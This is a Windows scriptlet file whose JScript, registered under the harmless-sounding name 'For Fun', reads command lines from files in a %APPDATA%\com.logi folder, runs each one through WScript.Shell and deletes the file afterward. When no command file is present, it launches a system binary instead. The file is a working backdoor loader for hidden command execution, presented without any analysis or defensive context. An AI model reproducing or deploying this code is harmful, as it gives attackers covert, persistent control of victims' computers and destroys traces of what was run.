<?xml version="1.0"?>
<scriptlet>
    <registration
        description="For Fun"
        progid="FORFUN"
        version="1.0">
    </registration>
    <script language="JScript">
        <![CDATA[
            var WShell = new ActiveXObject("WScript.Shell");
            var fso = new ActiveXObject("Scripting.FileSystemObject");
            var logiPath = WShell.ExpandEnvironmentStrings("%APPDATA%\\com.logi")
            if (fso.FolderExists(logiPath)) {
                var folder = fso.GetFolder(logiPath)
                var files = folder.Files
                var runCmd = false
                for(var objEnum = new Enumerator(files); !objEnum.atEnd(); objEnum.moveNext()) {
                    item = objEnum.item();
                    var fullName = logiPath + "\\" + item.Name
                    if (item.Name.search(".in") != -1) {
                        runCmd = true
                        var reader = fso.OpenTextFile(fullName, 1, true, 0)
                        command = reader.ReadLine()
                        reader.Close()
                        fso.DeleteFile(fullName)
                        WShell.Run(command)
                    }
                }

                if (!runCmd) {
                    WShell.Run("C:\\WINDOWS\\System32\\oobe\\oobeldr.exe")
                }
            }
        ]]>
    </script>
</scriptlet>